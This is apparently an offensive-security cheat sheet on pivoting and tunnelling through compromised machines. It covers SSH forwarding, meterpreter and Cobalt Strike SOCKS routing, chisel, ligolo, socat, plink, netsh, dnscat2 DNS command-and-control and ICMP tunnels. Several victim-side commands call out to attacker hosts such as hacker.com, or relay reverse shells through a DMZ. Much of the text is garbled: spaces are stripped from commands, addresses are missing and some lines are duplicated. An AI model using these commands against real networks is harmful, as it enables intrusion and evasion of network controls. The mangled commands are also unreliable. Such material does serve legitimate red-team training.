ICMP and SYN scans cannot be tunnelled through socks proxies, so we must disable ping discovery (-Pn) and specify TCP scans (-sT) for this to work.
Host -> Jump -> InternalA -> InternalB
# On the jump server connect the port 3333 to the 5985mknodbackpipep;nc-lvnp59850<backpipe|nc-lvnp33331>backpipe# On InternalA accessible from Jump and can access InternalB## Expose port 3333 and connect it to the winrm port of InternalBexec3<>/dev/tcp/internalB/5985exec4<>/dev/tcp/Jump/3333cat<&3>&4&cat<&4>&3&# From the host, you can now access InternalB from the Jump serverevil-winrm-uusername-iJump
SSH graphical connection (X)
ssh-Y-C<user>@<ip>#-Y is less secure but faster than -X
Local Port2Port
Open new Port in SSH Server --> Other port
ssh-R0.0.0.0:10521: port 1521 accessible in port 10521 from everywhere
ssh-R0.0.0.0:10521: port 1521 accessible in port 10521 from everywhere
Local port --> Compromised host (SSH) --> Third_box:Port
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
Port2hostnet (proxychains)
Local Port --> Compromised host (SSH) --> Wherever
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
Reverse Port Forwarding
This is useful to get reverse shells from internal hosts through a DMZ to your host:
ssh-idmz_key-R<dmz_internal_ip>:443: Now you can send a rev to dmz_internal_ip:443 and capture it in localhost:7000# Note that port 443 must be open# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems # and change the line "GatewayPorts no" to "GatewayPorts yes"# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
You need root in both devices (as you are going to create new interfaces) and the sshd config has to allow root login:
PermitRootLogin yesPermitTunnel yes
sshroot@server-wany:any#This will create Tun interfaces in both devicesipaddradd1.1.1.2/32peer1.1.1.1devtun0#Client side VPN IPifconfigtun0up#Activate the client side network interfaceipaddradd1.1.1.1/32peer1.1.1.2devtun0#Server side VPN IPifconfigtun0up#Activate the server side network interface
Local port --> Compromised host (active session) --> Third_box:Port
# Inside a meterpreter sessionportfwdadd-l<attacker_port>-p<Remote_port>-r<Remote_host>
background#meterpretersessionrouteadd<IP_victim><Netmask><Session># (ex: route add 8)useauxiliary/server/socks_proxyrun#Proxy port 1080 by defaultecho"socks4 1080">/etc/proxychains.conf#Proxychains
Another way:
background#meterpreter sessionusepost/multi/manage/autoroutesetSESSION<session_n>setSUBNET<New_net_ip>#Ex: set SUBNET<Netmask>runuseauxiliary/server/socks_proxysetVERSION4arun#Proxy port 1080 by defaultecho"socks4 1080">/etc/proxychains.conf#Proxychains
Cobalt Strike
SOCKS proxy
Open a port in the teamserver listening in all the interfaces that can be used to route the traffic through the beacon.
beacon> socks1080[+] started SOCKS4a server on: 1080# Set port 1080 as proxy server in proxychains.confproxychainsnmap-n-Pn-sT-p445,3389,598510.10.17.25
In this case, the port is opened in the beacon host, not in the Team Server and the traffic is sent to the Team Server and from there to the indicated host:port
Beacon's reverse port forward is designed to tunnel traffic to the Team Server, not for relaying between individual machines.
Traffic is tunneled within Beacon's C2 traffic, including P2P links.
Admin privileges are not required to create reverse port forwards on high ports.
rPort2Port local
In this case, the port is opened in the beacon host, not in the Team Server and the traffic is sent to the Cobalt Strike client (not to the Team Server) and from there to the indicated host:port
./chiselserver-p8080--reverse#Server -- Attacker./chisel-x64.execlient10.10.14.3:8080R:socks#Client -- Victim#And now you can use proxychains with port 1080 (default)./chiselserver-v-p8080--socks5#Server -- Victim (needs to have port 8080 exposed)./chiselclient-v10.10.10.10:8080socks#Attacker
# Start proxy server and automatically generate self-signed TLS certificates -- Attackersudo./proxy-selfcert# Create an interface named "ligolo" -- Attackerinterface_create--name"ligolo"# Print the currently used certificate fingerprint -- Attackercertificate_fingerprint# Start the agent with certification validation -- Victim./agent-connect<ip_proxy>:11601-v-accept-fingerprint<fingerprint># Select the agent -- Attackersession1# Start the tunnel on the proxy server -- Attackertunnel_start--tun"ligolo"# Display the agent's network configuration -- Attackerifconfig# Create a route to the agent's specified network -- Attackerinterface_add_route--name"ligolo"--route<network_address_agent>/<netmask_agent># Display the tun interfaces -- Attackerinterface_list
Agent Binding and Listening
# Establish a tunnel from the proxy server to the agent# Create a TCP listening socket on the agent ( on port 30000 and forward incoming TCP connections to the proxy ( on port 10000 -- Attacker
listener_add--addr0.0.0.0:30000--to127.0.0.1:10000--tcp# Display the currently running listeners on the agent -- Attackerlistener_list
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that portattacker> socatOPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1TCP:
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
You can bypass a non-authenticated proxy executing this line instead of the last one in the victim's console:
Create certificates on both sides: Client and Server
# Execute these commands on both sidesFILENAME=socatsslopensslgenrsa-out $FILENAME.key1024opensslreq-new-key $FILENAME.key-x509-days3653-out $FILENAME.crtcat $FILENAME.key $FILENAME.crt>$FILENAME.pemchmod600 $FILENAME.key $FILENAME.pem
Connect the local SSH port (22) to the 443 port of the attacker host
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4: ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker> sshlocalhost-p2222-lwww-data-ivulnerable#Connects to the ssh of the victim
It's like a console PuTTY version ( the options are very similar to an ssh client).
As this binary will be executed in the victim and it is an ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward only locally accessible port to a port in our machine:
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echoy|plink.exe-lroot-pwpassword [-p 2222]-R9090: port 9090 to out port 9090
Windows netsh
You need to be a local admin (for any port)
netshinterfaceportproxyaddv4tov4listenaddress=listenport=connectaddress=connectport=protocol=tcp# Example:netshinterfaceportproxyaddv4tov4listenaddress= Check the port forward was created:netshinterfaceportproxyshowv4tov4# Delete port forwardnetshinterfaceportproxydeletev4tov4listenaddress=
SocksOverRDP & Proxifier
You need to have RDP access over the system.
SocksOverRDP x64 Binaries - This tool uses Dynamic Virtual Channels (DVC) from the Remote Desktop Service feature of Windows. DVC is responsible for tunneling packets over the RDP connection.
In your client computer load SocksOverRDP-Plugin.dll like this:
# Load SocksOverRDP.dll using regsvr32.exeC:\SocksOverRDP-x64> regsvr32.exeSocksOverRDP-Plugin.dll
Now we can connect to the victim over RDP using mstsc.exe, and we should receive a prompt saying that the SocksOverRDP plugin is enabled, and it will listen on
Connect via RDP and upload & execute in the victim machine the SocksOverRDP-Server.exe binary:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Now, confirm in you machine (attacker) that the port 1080 is listening:
netstat -antb | findstr 1080
Now you can use Proxifierto proxy the traffic through that port.
Proxify Windows GUI Apps
You can make Windows GUI apps navigate through a proxy using Proxifier.
In Profile -> Proxy Servers add the IP and port of the SOCKS server.
In Profile -> Proxification Rules add the name of the program to proxify and the connections to the IPs you want to proxify.
NTLM proxy bypass
The previously mentioned tool: RpivotOpenVPN can also bypass it, setting these options in the configuration file:
It authenticates against a proxy and binds a port locally that is forwarded to the external service you specify. Then, you can use the tool of your choice through this port.
For example that forward port 443
Username Alice
Password P@ssw0rd
Tunnel 2222:<attackers_machine>:443
Now, if you set for example in the victim the SSH service to listen in port 443. You can connect to it through the attacker port 2222.
You could also use a meterpreter that connects to localhost:443 and the attacker is listening in port 2222.
Establishes a C&C channel through DNS. It doesn't need root privileges.
attacker> ruby./dnscat2.rbtunneldomain.comvictim> ./dnscat2tunneldomain.com# If using it in an internal network for a CTF:attacker> rubydnscat2.rb--dnshost=,port=53,domain=mydomain.local--no-cachevictim> ./dnscat2--dnshost=,port=5353
session-i<sessions_id>listen [lhost:]lport rhost:rport #Ex: listen, this bind 8080port in attacker host
Change proxychains DNS
Proxychains intercepts gethostbyname libc call and tunnels tcp DNS request through the socks proxy. By default the DNS server that proxychains use is (hardcoded). To change it, edit the file: /usr/lib/proxychains3/proxyresolv and change the IP. If you are in a Windows environment you could set the IP of the domain controller.
Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests.
./hans-v-f-s1.1.1.1-pP@ssw0rd#Start listening ( is IP of the new vpn connection)./hans-f-c<server_ip>-pP@ssw0rd-vping1.1.1.100#After a successful connection, the victim will be in the
# Generate itsudo./autogen.sh# Server -- victim (needs to be able to receive ICMP)sudoptunnel-ng# Client - Attackersudoptunnel-ng-p<server_ip>-l<listen_port>-r<dest_ip>-R<dest_port># Try to connect with SSH through ICMP tunnelssh-p2222-luser127.0.0.1# Create a socks proxy through the SSH connection through the ICMP tunnelssh-D9050-p2222-luser127.0.0.1
ngrok is a tool to expose solutions to Internet in one command line.Exposition URI are like:UID.ngrok.io
Create an account: https://ngrok.com/signup
Client download:
tarxvzf~/Downloads/ngrok-v3-stable-linux-amd64.tgz-C/usr/local/binchmoda+x./ngrok# Init configuration, with your token./ngrokconfigedit
It is also possible to add authentication and TLS, if necessary.
Tunneling TCP
# Pointing to ./ngroktcp4444# Example of resulting link: 0.tcp.ngrok.io:12345# Listen (example): nc -nvlp 4444# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345
Exposing files with HTTP
./ngrokhttpfile:///tmp/httpbin/# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
Sniffing HTTP calls
Useful for XSS,SSRF,SSTI ...
Directly from stdout or in the HTTP interface
Tunneling internal HTTP service
./ngrokhttplocalhost:8080--host-header=rewrite# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/# With basic auth./ngrokhttplocalhost:8080--host-header=rewrite--auth="myuser:mysuperpassword"
ngrok.yaml simple configuration example
It opens 3 tunnels:
1 HTTP with static files exposition from /tmp/httpbin/